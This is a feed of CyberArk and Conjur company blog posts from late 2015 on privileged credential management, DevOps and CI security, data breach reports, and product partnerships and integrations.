2015: Conjur’s Year In Review https://www.cyberark.com/blog/2015-conjurs-year-in-review/ Mon, 04 Jan 2016 19:54:00 +0000 https://cyberarkvx2.wpengine.com/blog/2015-conjurs-year-in-review/  

These past 12 months at Conjur have been nothing short of remarkable.  As we take a look back at 2015, we wanted to reflect on how far we have come, and how much we’ve grown.  Here are a few of our favorite moments and some of the milestones we are most proud of.

 A Year of DevOps

January

Andrew, Joanna, and Marta joined the team

We did some skiing, and Q1 planning, at the Bretton Woods Mount Washington Hotel.

We released our HIPAA Compliance Guide

 

February

Our Most Read Blog Post: SecDevOps: Can there be happiness in security work?

We published a guest blog post for Chef

The Ultimate Guide to DevOps Security was created.

 

March

Wes Joined the team

We moved into our new office space

Our CTO led a four hour workshop at ChefConf on Building Self-Documenting Applications

Released the Conjur 4.4 product update

 

April

We released our new Rest API documentation

We sponsored RSA and our CEO, Elizabeth Lawler presented “Is DevOps Breaking Your Company?”

Our Most Read Blog Post: Securing Heroku Apps

SDX Central wrote about Elizabeth and her talk at RSA

May

Josh joined the team

Our Most Read Blog Posts: Get Your Secrets Into Source Control and A Software Defined Firewall for Heroku

We released our Securing Jenkins Video

 

June

Alan joined the team

Summon, our open source project, was released

Josh spoke in London at DevOps Connect

Our Most Read Blog Post: Securing Docker with Secrets and Dynamic Traffic Authorization

Conjur listed as a top tool for DevOps in the Cloud

 

July

Mark and Mitch joined the team

The team headed to Las Vegas for Black Hat

Our Most Read Blog Post: Why Continuous Integration and Continuous Delivery Are Not the Same

 

August

We had some fun and team building at Escape the Room in Boston

Dustin Collins spoke about security at DevOpsDays Pittsburgh

In order to better secure Jenkins we released our Deployment Server Reference Architecture

We were named as one of Venture Beat’s most promising seed stage startups

Our Most Read Blog Post: Scaling Enterprise DevOps Security with Machine Identity

 

September

Dustin B. and Kurt joined the team

A few members of our team had a fantastic time sponsoring and attending DevOpsDays Boston

Our Most Read Blog Post: Secrets and Source Control: A Maturity Model

We created the CISO’s Secrets Management Checklist

 

October

Kerry, Matt, and our intern Ari joined the team

We threw a Halloween party in our office 

We released our all new User Interface

Josh Bregman taught attendees at Puppet Conf how to use Puppet with a secrets server

Conjur 4.5 was officially released

Elizabeth headed to New York to participate in a security panel at Velocity Conference.

We sponsored DevOps Enterprise

We were featured as Network World’s Product of the Week

 

November

Virginia joined the team 

Box chooses Conjur as it’s comprehensive security platform

Our Most Read Blog Post: Everyone’s Using Docker Now It’s Time to Secure It

 

December

We hosted our Conjur Holiday Party

Our partnership with SSH Communications Security began

Rafal guest blogged for Puppet Labs: Using Node Side Secrets with Conjur

We released our data breach infographic – The Unlucky 13: 2015’s Biggest Breaches


We have learned so much from all of our customers this year and are sincerely looking forward to everything we have on the horizon for 2016. Stay tuned for new product features and check out our blog regularly for helpful guides and key takeaways on security. We can’t wait to continue interacting with you on social and chatting with you at the many conferences and events we will be attending in the coming months. Wishing you and yours a healthy and happy New Year!

 

]]>
Millions of Voter Records Left Exposed https://www.cyberark.com/blog/millions-of-voter-records-left-exposed/ Wed, 30 Dec 2015 14:05:00 +0000 https://cyberarkvx2.wpengine.com/blog/millions-of-voter-records-left-exposed/  

If you’re the type of person who likes to keep their political affiliations off of the internet, avoiding partisan tweets, posts, and snaps, you seem to be out of luck. A white hat hacker recently uncovered 191 million exposed records of voter information. Included in the long list of data is the political party that you are registered under and a detailed account of the primaries and elections you decided to vote in, and those that you chose to skip.

Largest Data Breach of 2015 Exposes 191 Million Voting RecordsWith 191 million records exposed, this is the largest data breach of  2015. There is still a long way to go until election day and as most of the presidential hopefuls are just picking up steam, you will probably see many more cyberattacks with political aims in the coming year. As dynamics shift, and new candidates begin to lead in the poles, phasing others out, hackers will probably work to expose information about these people that will either be aimed at helping their campaigns or hurting them.

Here’s everything you need to know:

According to this piece on Hacked, the 300GB of leaked data dates as far back as 2000. The white hat hacker who uncovered the information, Chris Vickery, confirmed the data he found was all accurate after finding his own details, and the accurate details of others, on the list.

Forbes reports that, “It would appear every registered US voter is included in the leak”. Thankfully, social security numbers were not exposed in this leak. It was initially assumed that digital campaign company National Builder was to blame for the leak, however, spokespersons from the business insist that the IP address linked to the breach did not belong to them or one of their hosted clients. It is still unclear who is to blame for leaving the information vulnerable.

Fortune outlines the information that was likely exposed. The list contained the voter’s name, date of birth, gender, and address,  ethnicity, party affiliation, e-mail address, phone number, state voter ID, and whether he/she is on the “Do Not Call” list. What is most alarming is that this information, if in the wrong hands, could very easily be used for identity theft.

The San Francisco Chronicle points out that this breach shows a need for increased voter security. The author maintains that also campaigns have a reasonable need to access voter data, there need to be stricter security measures in place before information is just handed over, because the privacy of the voter should be top priority.Why Increased Voter Security Should be a Priority

This piece from CSO Online looks at the leak from an interesting perspective. The author points out that although voter information is typically public information to begin with, this is determined on a state by state basis. Different states have different rules about how the information can be distributed and therefore, people living in states with stricter laws, would have information exposed that would otherwise be kept private. The author also says that there are very strict guidelines for what people can use voter data for. People who obtain voter info aren’t  allowed to use it for commercial gain, etc. However, with this entirely exposed treasure trove of information, the data is unprotected and can be used in a multitude of unregulated ways.

Conclusion

This specific instance doesn’t appear to be politically malicious in nature, it was caused by a misconfigured database that left voter secrets exposed. However, the politically aimed cyberattacks that are sure to follow, are reason for concern since innocent voters will likely be impacted. Politicians put themselves out there, they are on the public stage, and open themselves up for dirty laundry being exposed. Whether right or wrong, this is just the way it is, there is no privacy for public figures. But what about us? What about the people who decide not to put on a show, what about those of us who keep our positions and opinions to ourselves? Our information is, unfortunately, going to be disclosed as well. If candidates don’t start securing their campaign secrets now, we are in for a lot of trouble. It is their duty to keep their supporters’ information safe. That way, when your republican uncle or liberal grandmother decide to send $10 to either Donald Trump or Hillary Clinton’s campaigns, those donations can stay anonymous, as they should be.

 

]]>
Short Video: Learn how CyberArk Secures and Manages Privileged Credentials Used by COTS Applications https://www.cyberark.com/blog/short-video-learn-how-cyberark-secures-and-manages-privileged-credentials-used-by-cots-applications/ Tue, 22 Dec 2015 20:26:28 +0000 https://www.cyberark.com/blog//

For more than a decade, Evan Litwak, CyberArk’s principal sales engineer, has worked with many companies to architect and successfully deploy privileged account security measures. For several years, he also worked directly for a large enterprise company and there, he was responsible for the global expansion of privileged identity management.

Given his depth of knowledge and expertise, I asked him to provide a brief overview of how CyberArk technology enables organizations to securely manage hard coded and embedded credentials in commercial off-the-shelf (COTS) and other applications. Our colleague, CyberArk EVP Adam Bosnian, recently wrote about the range of applications in an enterprise that require access to privileged credentials to perform tasks such as vulnerability management or discovery. With CyberArk Application Identity Manager seamlessly integrated with COTS applications, organizations can reduce the risk of unauthorized application credential usage and simplify credential management, while maintaining the performance requirements of mission-critical applications.

Key Functionality of CyberArk’s Application Identity Manager:

  • Eliminates privileged credentials used by COTS Applications. The credentials are instead centrally stored in the CyberArk Secure Digital Vault™ and retrieved when needed, using an SDK embedded in the application code.
  • Offers automatic or on-demand rotation of privileged credentials used by COTS applications without any downtime to the applications or the need for a maintenance window
  • Maintains operational continuity and high availability because credentials are stored in  the Credential Provider’s secure local cache to ensure fast retrieval and availability, independent of network availability or performance.

In a three minute video, Evan explains how CyberArk’s Application Identity Manager enables companies to safely turn around credentials on demand.

Watch the video:

 
]]>
Security Industry Report Identifies Credentials as a Gateway to Protected Health Information https://www.cyberark.com/blog/security-industry-report-identifies-credentials-as-a-gateway-to-protected-health-information/ Tue, 22 Dec 2015 14:38:00 +0000 https://www.cyberark.com/blog//

Healthcare companies and protected health information (PHI) have been at the center of some of the largest attacks in 2015. If you have been following the frequency of headlines, you may wonder how prevalent are the breaches? Well, the numbers are in. Last week, Verizon issued the 2015 Protected Health Information Data Breach Report, the first extension of the annual Data Breach Investigations Report.

The report is focused on health information data, but it’s important to note the impact is not limited to the healthcare industry alone. Organizations across many industries have access to health information perhaps from employee records, worker’s compensation or for other reasons. As noted in the report, “The fact that an organization is not in the healthcare industry or isn’t a HIPAA-covered entity doesn’t mean that it’s not at risk of a PHI data breach.”

In 2015, according the report, 90 percent of industries experienced a breach of PHI, and in total, more than 392 million records were exposed. While not all of these incidents were malicious – some were the result of accidental insider activity – the outcome was the same for the organizations: mandatory reporting, regulatory fines, potential lawsuits and a loss of confidence from the individuals impacted.

Interestingly, when Verizon analyzed the different types of data exposed during these breaches, the bulk of the information fell into one of four categories:

  • Medical records
  • Payment or payment card industry (PCI) information
  • Personal or personally identifiable information (PII)
  • Credentials

The inclusion of credentials in this group might seem to be a bit odd, but when you consider the information that credentials can provide access to, it makes sense. As noted in the report, “compromised credentials often are the gateway to the theft of data of other types.” Credentials are used by doctors to access patients’ electronic health records, by system administrators to maintain healthcare management systems and by pharmacy systems to retrieve and verify prescription information, to name just a few examples. Credentials that can be used to access sensitive and protected information must be treated like any other privileged credential in your IT environment.

Privileged account security solutions enable organizations to better secure PHI, PII and other sensitive information by effectively securing the accounts and credentials used to access this information. It’s important to proactively secure privileged account credentials, control and isolate privileged user sessions and monitor the use of these privileged accounts to detect anomalous activity that could indicate unauthorized access. By implementing such a solution, organizations can reduce the risk of a malicious PHI breach, prevent the accidental misuse of PHI by insiders and quickly locate abnormal activity in order to stop an attack before it becomes serious.

To learn how CyberArk can help to protect the privileged accounts that provide access to PHI, PII and other sensitive data, please visit our Privileged Account Security web page.

]]>
Looking Ahead: The 2016 Data Breach Forecast https://www.cyberark.com/blog/looking-ahead-the-2016-data-breach-forecast/ Tue, 22 Dec 2015 14:45:00 +0000 https://cyberarkvx2.wpengine.com/blog/looking-ahead-the-2016-data-breach-forecast/  

As we develop our business plans for the New Year, it is important to take a look at the most recent industry predictions in order to determine our key focus for the months ahead. Experian recently released its 2016 Data Breach Industry Forecast, outlining the developing data breach trends and urging enterprise leaders to craft security plans according to the predicted risks.

Experian 2016 Data Breach ForecastIt is no shock that healthcare was at the top of the list for industries at heightened risk of cyberattacks in 2016. Experian says that “91% of all health organizations reported at least one data breach over the past few years”. The healthcare industry deals with some of our most sensitive information. As there are more digital medical records and information transmitted due to new wearable technologies, there are even more places for hackers to find vulnerabilities and access sensitive information. These new developments, as well as the implementation of the Affordable Care Act, which has put more people in the system than ever before, means that there is an increased likelihood of cyberattacks. Medical records are some of the most valuable on the black market and are far more lucrative than credit card information for hackers, so it is no surprise that there is a predicted increase in breaches over the next year.

The forecast also cautions that businesses can’t solely focus on outsider threats. Breaches are often the result of employee negligence and mishandling of data. Therefore, it is vital to have systems in place to monitor employee activity.

Although many businesses now accept the EMV Chip cards, the technology has yet to be enabled in every store. Many small (and big) businesses do not take chip cards. Additionally, these new cards, while much more secure, do not make payment breaches impossible. Enterprises can’t rely solely on the EMV technology to keep information safe and must remain vigilant in properly securing payment information.  Since these cards are much harder to hack than traditional credit cards, there will likely be a focus on hacking online transactions where physical cards are not present.

Over 60 countries are creating tools for computer espionage attacks, and 29 countries now have formal units dedicated to cyber efforts. It is predicted that there will be an increase in cybercrime, specifically in incidents focused on exposing both corporate and government secrets as well as activities to disrupt military operations. These attacks, although focused one revealing specific information, will most likely also expose the personal information of millions of people. Although the OPM breach was likely done to target specific records, even unintended people were affected. According to Experian, the U.S. Director of National Intelligence has ranked “cybercrime as the No. 1 National threat, ahead of terrorism, espionage, and weapons of mass destruction”.

Hacktivism is also expected to make a comeback in 2016. Since many cyber criminals are motivated by ideological instead of monetary gains, institutions with polarizing opinions should be prepared. These types of attacks are aimed to ruin the reputation of the business and are often very difficult to resolve. Therefore, it is very important for businesses to make sure they are properly secured, in order to avoid, or at least mitigate, some of the damage.

2016 seems to be another year filled with cybercrime. However, these predictions are not set in stone. If businesses properly protect themselves they can avoid headlining the nightly news because of a data breach. With the proper secrets management solutions in place, sensitive data can remain untouched, and enterprises can save themselves millions of dollars and headaches.

 

]]>
The Importance of Protecting and Managing Privileged Credentials for Security Scanning https://www.cyberark.com/blog/the-importance-of-protecting-and-managing-privileged-credentials-for-security-scanning/ Fri, 18 Dec 2015 16:53:20 +0000 https://www.cyberark.com/blog//

Guest Post — by Manish Patel, Sr. Solutions Marketing Manager, Tenable Network Security

According to the Verizon Data Breach Investigations Report (DBIR), vulnerability management and continuous monitoring programs can be very effective in proactively preventing breaches as well as detecting compromised systems. As with many enterprise applications, vulnerability management solutions require the same level of access to privileged account credential as IT administrators. When performing a security scan or compliance audit, privileged access to target systems is often necessary in order to obtain richer scan results. Organizations understand this, but they also have a difficult time managing, maintaining and securing related credentials. When it’s done manually, it’s cumbersome.

Case in point, I recently met with an IT director for a retailer to understand how he uses Tenable products. I was surprised to learn that his team was not using the full capabilities for credentialed scans. I proceeded to share the benefits of credentialed scanning, noting the advantages over remote scanning. For example, I explained credentialed scanning can identify whether a patch for a given vulnerability has been applied in a method that is far more accurate (and safer) than running a remote check. Tenable’s credentialed scans can detect client side software in addition to software vulnerabilities and are executed on the host itself rather than across the network – a process that is not disruptive to operations and consumes far less system and network resources. Credentialed scans also offer deeper insight, providing greater visibility into the host by reading password policies, obtaining a list of USB devices, checking anti-virus software configurations and even enumerating Bluetooth devices attached to scanned hosts.

Yet, despite all the benefits, the IT director’s simple response was that it was too difficult to manage credentials individually on multiple security solutions in their distributed environment.

This customer’s challenge – the same challenge faced by many enterprise security professionals – highlights the impetus for Tenable and CyberArk’s technology integration which enables customers to maximize their existing investments and ease the process of protecting and managing privileged credentials for scanning across the enterprise.

Using Tenable’s Nessus® vulnerability management solution and SecurityCenter Continuous View™ solution with CyberArk Application Identity Manager allows customers to secure and centrally manage privileged credentials to hosts for vulnerability, compliance, malware and web application scanning.

This diagram provides a high-level visual of how the products work together:

TenableDiagram

When a credentialed scan is needed, Tenable’s solutions are configured to automatically query the CyberArk solution for privileged credentials. CyberArk provides the requested privileged credentials, and Tenable’s solutions use them to log into the target system to perform vulnerability and configuration auditing.

For the IT director with whom I spoke and many others in a similar situation, this integration offers the benefits of performing credentialed scans while at the same time eliminating the need to manually configure, store and rotate privileged credentials. This provides secure management and monitoring of privileged and administrative credentials. Furthermore, this integration allows organizations to more thoroughly address enterprise wide security mandates to lock down privileged credentials.

To learn more about the integration, please visit the Technology Integrations page on Tenable’s website. Visit CyberArk’s web site for more information about CyberArk Applications Identity Manager.  For technical details on configuring the solutions, please contact your Tenable or CyberArk support team.

]]>
Conjur Partners with SSH Communications Security https://www.cyberark.com/blog/conjur-partners-with-ssh-communications-security/ Thu, 17 Dec 2015 16:25:00 +0000 https://cyberarkvx2.wpengine.com/blog/conjur-partners-with-ssh-communications-security/  

Conjur is very happy to announce that we have just partnered with SSH Communications Security, the inventor of the SSH protocol and creator of solutions that allow teams to enable, monitor, and manage encrypted networks.

Conjur’s authorization platform in combination with SSH’s automated authentication creates a new standard in enterprise identity management solutions. This partnership will allow us to provide our customers with superior comprehensive security controls  that boost both efficient delivery of business objectives and also provide the necessary governance for compliance and audit.

conjur-ssh-partner.png

Working with SSH’s CryptoAuditor encrypted channel monitoring solution, Conjur can operate in any elastic cloud environment via a lightweight deployment while maintaining its regular flexibility and ease of use.

Conjur + SSH provides customers with three main advantages. It allows them to:

  1. Audit encrypt efficiently: Allows you to intercept, monitor, record, and replay the content of the most common data-in-transit encryption protocols

  2. Connect credentials: You can connect credentials, including SSH keys, to a given user and then control the commands users are allowed to execute

  3. Automate machine based security: In both cloud or hybrid cloud infrastructures

For more information about the partnership, take a look at the full press release.

 

]]>
Puppet and Node-Side Secrets https://www.cyberark.com/blog/puppet-and-node-side-secrets/ Wed, 16 Dec 2015 19:13:00 +0000 https://cyberarkvx2.wpengine.com/blog/puppet-and-node-side-secrets/  

Earlier this week one of our platform developers, Rafal Rzepecki, had the opportunity to guest blog on the Puppet Labs blog.  You can view the original blog post here.

Rafal’s post was inspired by the presentation our Vice President,  Josh Bregman, gave at PuppetConf back in October.  Josh’s presentation focused on using Puppet with a secrets server.  You can watch the video of Josh’s presentation here.

puppet-labs-logo.pngIn Rafal’s blog post, he discusses that in today’s modern infrastructure environments, machines are as distrustful of one another as they are of humans.  This dynamic creates a need for enterprises to identify all of the components of their infrastructure with secrets so that trust, collaboration, and security remain priorities in an automated environment.

Rafal goes on to show how putting these secrets in things like configuration managment files may seem like a good idea, but in reality these files will end up in the company Git repository, making them freely available to everyone who has access to Git.  Not ideal.puppet-code.png

The solution Rafal proposes is to encrypt a hiera YAML file for the host and then leverage nodes so that the secrets don’t need to pass through the puppet master.  This configuration ensures that a compromise of the master isn’t as fatal — an attacker cannot surreptitiously obtain access to other systems. The master can push updates to nodes that extract secrets and send them somewhere, but the manifest changes required would make the attack much more visible.

You can read through Rafal’s full explanation, complete with sample code, on the Puppet Blog.

 

]]>
Continuous Integration Insecurity https://www.cyberark.com/blog/continuous-integration-insecurity/ Thu, 10 Dec 2015 18:26:00 +0000 https://cyberarkvx2.wpengine.com/blog/continuous-integration-insecurity/  

We at Conjur see little value in fear as a motivator. Whenever we do find legitimate reasons to be afraid, we like to build them into constructive conversations around better practices.

Today’s focus is on (in)security for continuous integration (CI) tools.

Insecurity for CI ToolsThis year, penetration tester and infosec researcher Nikhil Mittal has given the same presentation at both Black Hat conferences (USA and Europe). Mittal isn’t being lazy, he’s being relevant. For his talk “Continuous Intrusion: Why CI tools are an attacker’s best friends,” he tested five different tools — Jenkins, CruiseControl, Go, TeamCity, and Hudson — and found serious security issues with all of them.

When I say serious, I’m talking fundamental infrastructure security threats.

Thanks to low default security settings and practices that are far from “best,” Mittal shows that gaining access to CI tools can result in ownership over anything from the build process, source code, Git credentials, SSH keys, even all the way down to the machines running the slaves.

The bluntest version:

“I have not been through a single Pen Test or Red Team engagement where access to a CI tool did not result in Domain Admin access.”

The better practices he outlines are the classics for any automation tool:

  • password policy enforcement
  • more security-conscious configuration and development
  • eliminating plaintext credentials on the master

These are fantastic first steps, but they fall short of best practices, especially from an audit and compliance standpoint.

Our technical wizards have been hard at work lately putting together the Ten Factor CI Job.

Beyond these standards, it would also be great to see an iteration of Mittal’s test with Conjur’s orchestration platform providing auditable role-based identity and access management for the CI tool masters, slaves, and teams of users.

Conjur’s Jenkins solution, for example, not only secures all the credentials and keys that otherwise might wind up in source control, our RBAC model allows fine granularity in granting temporary access to jobs and managing privileged access for engineers.

Awareness is always the first step, and for raising it with reference to CI insecurity, we thank Nikhil. Now it’s time to take steps two, three, and beyond…

 

]]>
Global Survey: What Can IT Security Teams Do to Better Educate Executives on Cyber Security? https://www.cyberark.com/blog/global-survey-what-can-it-security-teams-do-to-better-educate-executives-on-cyber-security/ Wed, 09 Dec 2015 15:31:19 +0000 https://www.cyberark.com/blog//

Earlier this year, thousands of corporate executives from leading global organizations convened in Switzerland for the World Economic Forum. Cyber security was among the key discussion topics. According to The National Cybersecurity Institute’s synopsis of the discussion, “All agreed that cyber security is a mainstream business concern now. Alliances, information sharing about attacks, and combat measures are increasing. CEOs and world leaders are paying attention now. They are realizing that significant attacks pose an enormous threat to profitability and reputation.”

It’s encouraging to see reports of heightened cyber security awareness, but there is still work to be done for better alignment between enterprise CEOs and their IT security teams. This is underscored by our newly released survey, “The Gap Between Executive Awareness and Enterprise Security,” which found that 69 percent of IT security professionals believe cyber security is too technical for CEOs and 53 percent of CEOs make business decisions without regard to cyber security. The independent study, conducted by Dimensional Research, surveyed 304 global IT security professionals to determine how they view CEO leadership on cyber security issues, in order to drive productive conversations that prioritize enterprise security. The findings show that IT security practitioners increasingly believe they need greater cyber security leadership from their executives.

IT security professionals rely on executive level leadership on security issues, and CEOs increasingly rely on their IT security teams to provide the security information that matters. The survey shows that the cyber security awareness gap may be driven in part by the need for security teams to properly inform CEOs about what’s business critical when it comes to security.

Today, one-third of CEOs and 43 percent of management teams are still not regularly briefed on cyber security issues and related business risks. While 59 percent of respondents stated that threat detection metrics are the most effective for measuring security program effectiveness, 79 percent simply provide compliance and audit findings to their CEOs and executive teams to demonstrate security effectiveness.

Compliance does not equal security. It can lull a CEO into a state of complacency because all it demonstrates is a simple checking of a box without context for responsible levels of information protection.

Security professionals need to arm their CEOs and executive teams with information such as threat detection and risk metrics versus compliance and system availability. This can also help organizations to prepare for 2016 initiatives. Of note, endpoint security and privileged account security were cited as the top two organizational security priorities for the coming year. The C-suite will want to understand these priorities, so it will be important to share related and appropriate metrics.

The full survey is available here. For tangible guidance on how to build effective cyber security programs, download and read “The Balancing Act: The CISO View on Improving Privileged Access Controls.”  This report features advice from a panel of CISOs from global 1000 enterprises about how to lead a comprehensive privileged account security program including recommendations for getting executive buy-in, delivering metrics that matter, and measuring effectiveness of the controls. The report is available for free at https://www.cyberark.com/cisoview.

]]>
How To Securely Scale Continuous Integration https://www.cyberark.com/blog/how-to-securely-scale-continuous-integration/ Wed, 09 Dec 2015 14:48:00 +0000 https://cyberarkvx2.wpengine.com/blog/how-to-securely-scale-continuous-integration/  

At Conjur, we’ve developed the principles of the Ten-Factor CI Job to inform how we build and test our software. Applying these principles has allowed us to create our software rapidly, reliably, and reproducibly. 

10FactorCI.png

Here’s how we’ve applied each of the ten factors:

1)  Codebase: All code, including the description of the Jenkins jobs, gets committed to GitHub repos. We use the Jenkins Job DSL Plugin to create our jobs and these definitions are stored in a repo, too. Each of our jobs has a single script that runs tests.

2)  Dependencies: Most jobs use Docker containers to manage dependencies. Slaves are all configured using a Chef cookbook so we know exactly what is installed. Slaves are conjurized: we use Conjur SSH to control who gets access to the slave and what commands can be run on it.

3)  Config: We use Summon to fetch any secrets required for build, test, and deploy from a Conjur server.

4)  Backing Services: Many of our jobs rely on a running Conjur appliance. We use a local Docker registry to store a preconfigured appliance image. Any job that needs an appliance can start a container from it.

5)  Build, Release, Run: Storing the DSL for our jobs in git means that they are versioned. If we need to recreate a build, we can go back and find the exact job that created the artifact.

6)  Processes: All of our Jenkins jobs delete the workspace before they start. Any required images are pulled from the local registry as part of initialization.

7)  Disposability: Docker containers make this easy, but there are two things to watch out for: transient, job-related images should build quickly, and containers should get run with –rm. Maximizing layer reuse is an important technique for making the transient images build quickly. For example, many of our projects use bundler for gem management. The Dockerfile used to build an image to test such a project has lines like these in it:

  • ADD Gemfile Gemfile.lock ./  # as well as the gemspec, if appropriate
  • RUN bundle install –deployment
  • ADD . ./ # add the rest of the source code.

Structuring the Dockerfile this way allows reuse of the layer created by the bundle install, as long as the Gemfile and Gemfile.lock remain unchanged…This can be a big time saver.

8)  Dev/Prod parity: That single script from Factor 1 will run on a dev laptop, as well as on the Jenkins slave. As mentioned above, our Jenkins slaves get created from a Chef cookbook. We use Vagrant to create the slaves, allowing us to spin up an AWS instance (connected to our Jenkins master), or a VirtualBox VM (for developer use).

9)  Logs: Jobs that run in containers write to stdout and stderr, each of which gets captured by Jenkins. Test output gets written in JUnit format and we use the Jenkins JUnit Plugin to publish them.

10)  Audit: All access of secrets by a Jenkins slave during build and test gets audited in Conjur. If other information needsto be captured,  custom audit records can be created.

Here are some other things to consider:

Make sure your Jenkins slaves are cattle, not pets. Sometimes, the expedient thing is to “fix the build machine” when a job breaks. But if this isn’t also accompanied by updates to the machine description (e.g. by changing the Chef recipe), you’re asking for trouble.

As your teams grow, you can use Jenkins folders along with the Conjur Jenkins plugin to manage permissions for Jenkins jobs. Even if you conjurize your Jenkins slaves, each still only has a single identity. If teams, each of which should have disjoint sets of permissions, share Jenkins slaves, it’s hard to manage and audit what the teams are doing. If you use the CloudBees folder plugin to segregate teams, you can use the Conjur Jenkins plugin to give an identity to each job run by a team.

Having separate identities for “build” and “publish” follows the principle of least-privilege and allows for better auditing of the provenance of an artifact.

Check here for more details on how Conjur helps secure jenkins.

 

]]>
Is There a Perfect Storm on the Horizon as Businesses Address Cyber Security and Make a Digital Transformation? https://www.cyberark.com/blog/is-there-a-perfect-storm-on-the-horizon-as-businesses-address-cyber-security-and-make-a-digital-transformation/ Tue, 08 Dec 2015 19:24:20 +0000 https://www.cyberark.com/blog//

Reflecting on the ability of businesses to take advantage of new technologies and digital transformation, Christoph Kilger, partner at Ernst & Young, Germany was recently quoted, “Concerns around IT security are holding them back and many are still locked in a traditional, conservative way of thinking.”

That may be the case for some companies, but the world is rapidly changing and there are plenty of businesses that have made the transition or launched with a new business model. Innovative companies understand cyber security concerns are persistent in a digital economy, but addressable with proactive mitigation.

In the November 2016 issue of Fortune, Geoff Colvin asked readers to “Imagine an economy without friction – a new world in which labor, information, and money move easily, cheaply and almost instantly.”

Not only can we imagine it, we live it. Uber, Airbnb and many others are examples of this new economy that relies heavily on technology to connect people with products or services. When a company makes a digital transformation, technology is the backbone of the business. This ecosystem extends from websites and social media channels, to marketing automation and sales management tools. It covers supply chain management, communication systems, commercial transactions and more.

Nicholas Evans, VP & GM at Unisys, recently offered 6 steps for digital transformation, and noted, “Advanced cybersecurity is a key enabler because when emerging technologies are not secure from the start, they create delays in realizing their full business benefits as organizations struggle to implement appropriate security controls.”

With this in mind, it’s easy to understand why security is a strategic part of business today, and it does not go unnoticed by the C-Suite.

According to an October 2015 Gartner press release, “Gartner says Cybersecurity professionals are the new guardians of digital change.*” That’s a lot of responsibility – in addition to the usual expectations. Do we have enough qualified pros available to take this responsibility head on? Statistics show there is a cyber security skills gap. A Frost & Sullivan report predicts a shortfall of global information security workforce will reach 1.5 million in five years.

The ISACA and RSA Conference Survey, “State of Cybersecurity: Implications for 2015” reports that it is not only difficult to find qualified cyber security professionals but once hired, there is often a skills gap in their ability to understand the business. More so than having appropriate technical and communication skills.

This sentiment is echoed by one of CyberArk’s customers, Jim Motes the CISO of Rockwell Automation.  In a recent CIO Magazine article, he lamented, “We have a shortage of cybersecurity professionals, with people shoved into jobs [they] are not qualified to do…..We have a stressed-out work force, a shallow talent pool and an increase in demand like nothing we’ve ever seen before.”

A forward-thinking CISO, he proposes a co-op of seasoned information security professionals as a way of addressing the cyber security skills gap.  Operating like a managed security service provider, he believes the co-op, for example, would be well-positioned to protect privileged user accounts which are the preferred path hackers take to a company’s most valued data.

Motes has also shared his experience on rolling out security programs in “The Balancing Act: The CISO View on Improving Privileged Access Controls.

When it comes to security and 21st century business, we don’t have the luxury of time. Speed is everything in a digital economy.  While we nurture the next crop of IT security professionals and enable them to be the “guardians of digital change,” it is important to facilitate opportunities where peers can learn from each other and share best practices.

Jim Motes embraces this, and so does CyberArk.  CyberArk launched The CISO View – an industry initiative that explores CISO perspectives on topics related to improving privileged access controls and shares practical, peer-driven advice on security strategies. Learn more here and share your ideas.

*Gartner Press Release, Gartner Says Cybersecurity Professionals Are the New Guardians of Digital Change, October 7, 2015, http://www.gartner.com/newsroom/id/3144319

]]>
The Unlucky 13: 2015’s Biggest Breaches https://www.cyberark.com/blog/the-unlucky-13-2015s-biggest-breaches/ Tue, 08 Dec 2015 14:37:00 +0000 https://cyberarkvx2.wpengine.com/blog/the-unlucky-13-2015s-biggest-breaches/  

We’re approaching 2016 and it looks like we are headed for another year filled with costly data breaches. Every week it seems that a new company has left our data susceptible to cybercriminals and we are forced to monitor our accounts, waiting for suspicious activity. Despite the bad press, poor reputation, and high prices that come along with data breaches, enterprises are still failing to place security at the top of their to-do list.

The Ponemon Institute reports that the average data breach costs companies approximately $3.8 million dollars. This year, millions of consumer data was exposed. Take a look at 13 of the biggest data breaches of 2015 that exposed nearly 208 million records. 

Conjur-DataBreach-Infographic-5.png

Like the graphic? You can download it here.

Want to avoid having your name featured on next year’s timeline? Sign up for a demo and learn how Conjur can help you secure your infrastructure.

 

]]>
Cyber Security Experts Recommend Eight Ways to Reduce the Misuse of Privileged Accounts https://www.cyberark.com/blog/cyber-security-experts-recommend-eight-ways-to-reduce-the-misuse-of-privileged-accounts/ Mon, 07 Dec 2015 19:02:12 +0000 https://www.cyberark.com/blog//

Last year, CyberArk issued a threat report: “Privileged Account Exploits Shift the Front Lines of Cyber Security.”  The key findings provide an excellent primer on the role of privileged accounts in targeted attacks. The full report is a must read for security teams charged with proactively protecting internal networks.

The report is based upon interviews with seasoned threat investigators at five firms renowned for detecting, analyzing and remediating serious cyber security incidents at Global 1000 companies:

  • Cisco Talos Security Intelligence and Research Group
  • Deloitte & Touche LLP’s Cyber Risk Services and Deloitte Financial Advisory Service LLP’s Computer and Cyber Forensics Team
  • Mandiant, a FireEye Company
  • RSA, the Security Division of EMC
  • Verizon RISK Team, Verizon Enterprise Solutions

In the report, these experts provided basic guidance to help companies detect and reduce misuse of privileged accounts:

  1. Know what privileged accounts you have, what they do and are supposed to do. Consider IT administrative credentials, default and hard-coded passwords, application backdoors, SSH keys, etc. Then, limit those privileges as much as possible to reduce the potential for abuse.
  2. Improve security of privileged accounts by changing default passwords and using different administrative passwords on each system. If attackers gain privileged access to one system, they usually will try the same password to gain access to all other similar systems within the company.
  3. Enforce one-time passwords that expire after a single use. For further protection, companies can encrypt their privileged account credentials and automate credential rotation.
  4. Proactively monitor privileged accounts and how they interact with data and technology assets. Do not passively wait for security tools to alert you of a problem. For example, scout for admin credentials that should not be accessing certain types of systems or for domain admins logging into many different parts of the network. If a privileged user is VPNing into the network from multiple far-flung locations in a short amount of time, that’s often a sign of fraudulent access.
  5. Perform regular, recurrent “housekeeping” of information assets and how they’re accessed. Develop and employ tight governance practices around the provisioning of user access and privileges and around data and asset classification. Scrub your Active Directory and all authentication/access points. Decommission privileged accounts that haven’t been used recently. Many will likely be service accounts with fixed credentials.
  6. Monitor and limit the privileges of service accounts. For example, if an account runs a particularly important service, it should never have remote access. In many cases, it shouldn’t even be usable through a graphical user interface (GUI). For example, a service account running a database should never need a GUI to access its services.
  7. Apply patches as quickly as possible. Many companies worry about zero day vulnerabilities, but such exploits are so valuable that attackers use them only in special circumstances and hardly ever on a widespread basis. For every zero day you hear about, there are millions of known vulnerabilities that can be eliminated through patching.
  8. Practice classic defense in depth. The more overlapping security layers in your environment, the more you lower your risks. Reducing vulnerabilities in privileged accounts can greatly impair the ability of attackers to maneuver within and manipulate critical IT systems.

